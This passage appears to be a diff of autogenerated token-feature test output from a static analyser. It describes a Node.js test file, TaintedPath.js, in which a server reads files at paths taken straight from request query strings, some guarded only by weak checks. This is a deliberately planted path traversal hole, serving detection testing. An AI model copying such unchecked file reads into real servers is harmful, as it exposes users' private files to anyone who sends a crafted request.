readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:5 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:5 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:7 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:7 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:7 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:7 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:13 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:13 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:13 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:13 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:36 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:36 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:36 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:36 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:36 | exceptional return of res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:36 | res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:36 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:36 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:36 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:36 | res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:33:9:33:13 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:9:33:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:9:33:13 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:33:9:33:13 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:33:9:33:13 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:16 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:16 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:16 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:16 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:29 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:29 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:29 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:29 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | @@ -4853,6 +59093,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:33:15:33:35 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:33:18:33:29 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:18:33:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:18:33:29 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:33:18:33:29 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:33:18:33:29 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:33:31:33:34 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:33:31:33:34 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:33:31:33:34 | path | calleeImports | fs | @@ -4862,11 +59107,81 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:33:31:33:34 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:33:31:33:34 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:33:31:33:34 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:3 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:3 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:3 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:3 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:3 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:6 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:6 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:6 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:6 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:6 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:23 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:23 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:23 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:23 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:23 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:23 | path = ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:23 | path = ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:23 | path = ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:23 | path = ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:35:3:35:23 | path = ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:35:10:35:17 | sanitize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:35:10:35:17 | sanitize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:35:10:35:17 | sanitize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:35:10:35:17 | sanitize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:35:10:35:17 | sanitize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:35:10:35:23 | exceptional return of sanitize(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:35:10:35:23 | exceptional return of sanitize(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:35:10:35:23 | exceptional return of sanitize(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:35:10:35:23 | exceptional return of sanitize(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:35:10:35:23 | exceptional return of sanitize(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:35:10:35:23 | sanitize(path) | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:35:10:35:23 | sanitize(path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:35:10:35:23 | sanitize(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | | autogenerated/TaintedPath/TaintedPath.js:35:10:35:23 | sanitize(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:35:10:35:23 | sanitize(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:34 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:34 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:34 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:34 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:34 | exceptional return of res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:34 | res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:34 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:36:3:36:34 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url 